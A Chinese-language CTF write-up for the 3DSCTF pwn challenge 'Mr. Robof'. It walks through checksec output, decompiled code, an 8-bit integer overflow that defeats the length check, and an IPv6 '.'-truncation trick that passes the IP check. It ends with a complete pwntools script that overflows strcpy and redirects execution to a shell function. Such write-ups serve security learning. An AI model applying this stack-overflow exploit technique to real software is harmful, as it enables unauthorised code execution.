3DSCTF PWN —— Mr. Robof

发表于 |

竟然没任何保护

1
2
3
4
5
6
7
# checksec ./020d04ea8f10ac07c5b83f3d0910108b 
[*] '/root/learn/3DSCTF/Robof/020d04ea8f10ac07c5b83f3d0910108b'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

基本上这种情形就是执行shellcode

漏洞在storeCheckedIP,只要绕过ip检查即可进入这里

1
2
3
4
5
6
7
8
int __cdecl storeCheckedIP(char *src)
{
  char dest; // [sp+8h] [bp-30h]@1

  strcpy(&dest, src);
  puts("// TODO - Finish later...");
  return 1;
}

这两个检查是validateSize和validateIP

1
2
v6 = validateSize(&s);
v5 = validateIP(&s);

size是大于1,小于0x28,这个strlen只要00截断即可,但是上面的strcpy也是00截断,这个肯定不行的,结果一看这个v2是8位unsigned整形,可以整数溢出啊

1
2
3
4
5
6
7
8
_BOOL4 __cdecl validateSize(char *s)
{
  unsigned __int8 v2; // [sp+2Fh] [bp-9h]@1

  _x86_get_pc_thunk_ax();
  v2 = strlen(s);
  return v2 > 1u && v2 <= 0x28u;
}

检测ip的(其中inet_pton是将“点分十进制” -> “二进制整数”)
但是这里遇到.就直接返回了,这个就棘手了
后来发现10是ipv6的地址,汗~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __cdecl validateIP(int input)
{
  char *v1; // eax@1
  char cp[41]; // [sp+7h] [bp-51h]@3
  int v4; // [sp+38h] [bp-20h]@6
  int i; // [sp+4Ch] [bp-Ch]@1

  v1 = (char *)_x86_get_pc_thunk_ax() + 6430;
  for ( i = 0; i <= 40; ++i )
  {
    if ( *(_BYTE *)(i + input) == '.' )
    {
      cp[i] = 0;
      return inet_pton(10, cp, &v4);
    }
    cp[i] = *(_BYTE *)(i + input);
  }
  return inet_pton(10, cp, &v4);
}

ip示例

1
2
3
4
# ./020d04ea8f10ac07c5b83f3d0910108b 
0:0:0:0:0:0:0:0
-> Valid IP
// TODO - Finish later...

而且ip那里特意给了个.截断,最终exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# -*- coding: utf-8 -*-
from pwn import *

p = process("./020d04ea8f10ac07c5b83f3d0910108b")
readips = 0x08048819
padding = "a" * 36
trueipv6 = "0:0:0:0:0:0:0:0" 
payload = trueipv6 + "\x2e" + padding
payload += p32(readips)
payload += "a" * (270 - len(payload))

p.sendline(payload)

p.interactive()
打赏专区
paypal: https://www.paypal.me/giantbranch
假如你看不到评论,可能是你访问Disqus被墙了,请使用代理访问